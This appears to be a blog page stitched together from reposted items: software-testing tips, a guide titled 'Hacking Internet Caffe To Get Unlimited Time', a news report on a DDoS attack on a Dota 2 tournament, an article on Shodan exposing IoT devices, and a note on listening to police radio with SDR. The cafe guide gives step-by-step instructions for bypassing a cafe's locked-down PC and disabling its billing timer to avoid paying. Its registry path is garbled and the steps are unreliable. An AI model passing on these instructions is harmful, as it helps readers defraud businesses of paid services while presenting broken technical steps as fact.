7) Use your previous test data pattern to analyse the current set of tests.

8) Try some standard test cases for which you found the bugs in some different application. Like if you are testing input text box try inserting some html tags as the inputs and see the output on display page.

9) Last and the best trick is try very hard to find the bug .As if you are testing only to break the application!

Source:http://www.softwaretestinghelp.com/

Hacking Internet Caffe To Get Unlimited Time

I spent some time in internet cafe, playing LAN games with my friends. We used to pay only few bucks and then play for hours for free, without getting noticed, using a little trick. You don’t need any software or hacking skills to do this trick. It’s very simple and anyone with a bit computer knowledge can do it. Lets start.

How to disable the timer on the computers in Internet Cafe and play with your friends as long as you want.

1. First of all create a new Text Document. Then write CMD in it, and then save it as anything.bat. (Make sure you’re file is .bat)


2. Now find your batch (.bat) file and run it. If you’ve done it correctly, you’ll see that CMD (Command Prompt) will open.

3. Now, write in the CMD: cd\windows (This will change the directory to WINDOWS). Then type regedit and regedit editor should open.


4. Now navigate to:

HKEY_CURRENT_USER>AppEvents>Software>Classes>Microsoft>Windows>Current Version>Internet Settings>Policies>System

5. Then on the right pane where it says Disable Taskmanager, right click on it and scroll down to modify, then change the value of it to 0. Then open Task Manager (CTRL+ALT+DELETE or CTRL+SHIFT+ESCAPE) and disable the Internet Cafe’s timer.

If you did this right, you’re done. Happy Hacking 😉

Source: hackpconline.com

Valve’s $18 million Dota 2 world tournament, The International taken down by hackers

Hackers brought down the world championships for mega-popular online game Dota 2 called The International which has a $US18 million prize money, through a Distributed Denial of Service (DDoS) attack. The hugely popular world tournament which is organised by developer of Valve Software, was brought to a crashing halt in the middle of its very first round of the second day.

PC World reports that just when things started to heat up in match one of the best-of-three competition between Evil Geniuses and compLexity Gaming, the game was suddenly struck by lag and paused soon thereafter. The DDoS attack, which was confirmed by a Dota 2 analyst on the official The International Livestream, held up the games for around a hour.

Analysts stated that since the Dota 2 matches at The International are played via the public Internet, not a local network, the tournament was prone to an outside attack.

Though PC World has stated that The International has commenced, the LiveStream still shows only the wallpaper of the tournament.

When gameplay was paused due to the DDoS attack, Dota 2 teams Evil Geniuses and compLexity Gaming were just starting their match.

Source: techworm

Shodan exposes IoT vulnerabilities

The Shodan search engine can be used to find routers with exposed backdoors, unsecured webcams, and industrial control systems still using default passwords.

It’s the Google for the Internet of Things, a playground for hackers and terrorists — and, maybe, a useful tool for companies looking to lock down their own environment.

Shodan founder John Matherly launched the search engine more than five years ago as a market intelligence tool, designed to provide technology companies with information about where and how their products was being used.

“And of course the same type of information can be queried about competitors, to better understand how they’re positioned in the market using empirical data,” said Matherly.

Since its launch, however, the search engine has taken on a life of its own, he admits.

“It has become a tool by security experts to gain a better understanding of the Internet,” he said.

The public website is actually a small piece of what Shodan offers. Enterprise clients can buy raw, real-time access to all the data it collects.

For example, a company can use Shodan to search its own networks.

“It is very common for large companies to have a random computer laying around running Telnet or having a building automation system online that wasn’t properly configured by a contractor,” he said. “And with the advent of cloud computing, I’ve seen a big increase in the number of publicly-accessible cloud servers that don’t have any authentication enabled and therefore leak their entire contents to the Internet.”

A company can also use Shodan to check the security of companies they’re considering acquiring or doing business with.

Another use of Shodan is to find the malware command and control servers used by cybercriminals, which is normally a very time-intensive process.

“However it is very straight-forward to identify them with Shodan once a fingerprint has been established,” Matherly said.

“I don’t see it as a threat,” said Leonard Jacobs, president and CEO at Minneapolis-based managed security service provider Netsecuris Inc. “For our practice, we see it as a good thing for our customers, we use it to confirm what we find through other techniques.”

In theory, a company would know about all the devices and systems it has exposed on the Internet, he said.

But sometimes, for the sake of convenience, corners are cut.

“You’ll be surprised what you’ll find out there,” he said.

A force for evil?

Shodan allows attackers to quickly identify specific devices, or specific software, on a very large scale.

“For example, every web-connected Furby could be identified quickly by going to Shodan and looking for the appropriate signature, versus the hacker having to scan the entire Internet,” said Shane MacDougall, a partner at Canadian security consultancy Tactical Intelligence Inc.

Cybercriminals, terrorists, rogue nation-states, even rival companies can use Shodan to identify critical infrastructure and cause it to malfunction, said Jean Taggart, security researcher at San Jose-based Malwarebytes Corp.

And fixing these problems isn’t always a high priority for organizations, he added.

“I worry that we won’t see movement until a serious enough event occurs,” he said. “A government-led effort to identify the owners of these devices and secure them is in high order.”

Using Shodan also means that a hacker doesn’t set off any warning bells at a targeted company.

According to Michael Baucom, vice president of R&D at Columbia, Md.-based Tangible Security, the true power of Shodan is that all the scanning has already been done — the user is simply querying the results without revealing their address or actions to the target, and with minimal effort.

“Scans of the magnitude of Shodan would take a long time and would be very noisy,” he said.

But Shodan doesn’t actually create any vulnerabilities, said Hagai Bar-El, CTO at Sansa Security, an Israel-based security firm focusing on the Internet of Things.

“It merely points them out,” he said. “Unarguably, detecting weak nodes is an important part of an attack, but hackers have been able to do this with automated crawlers, long before Shodan was developed.”

In addition, most independent security researchers agree that once a vulnerability is discovered, the public is better off if it is publicized rather than kept secret, he said.

“The public that relies on the vulnerable system has a right to be made aware of its vulnerable state,” he said. That way, they can do something about it, such as switching vendors.

“Publishing a flaw found in a commercial product is the only effective way of encouraging the vendor to actually fix it,” he added. “History is full of examples of vendors that have ignored security issues in their products for months and years until those flaws are made public.”

Meanwhile, every unfixed vulnerability is a “ticking timebomb,” he said.

But it’s not just that the bad guys already have these tools available, said Shodan’s Matherly,. The Shodan website requires that users register for an account, and only the first set of search results is free.

There are also “numerous technical measures” to prevent abuse, Matherly added.

“In reality, it is much cheaper and effective for the bad guys to use a botnet or a compromised host running [open source network scanning tools] zmap or masscan than to search Shodan.”

Source: csoonline.com

How to Listen on Police and Fire Radio Frequency

If you’ve lost interest in that DVB dongle you bought to give software defined radio a try you should bust it back out. [Harrison Sand] just finished a guide on how to use SDR to listen in on Police and Fire radio bands.

The project, which results in the crystal clear audio reception heard after the break, uses a whole lists of packages on a Windows box to access the emergency bands. SDRSharp, which has been popular with other DVB dongle hacks, handles the hardware work. In this case the dongle is a Newsky TV28T v2 module that he picked up for a few bucks. He’s also using some support programs including the Digital Speech Decoder which turns the data into audio.

> Top 5 Facebook Scams

We wonder how many areas this will work for. It was our understanding that law enforcement was moving to encrypted communications systems. But all we really know about it is that you can jam the system with a children’s toy.

Source: hackaday.com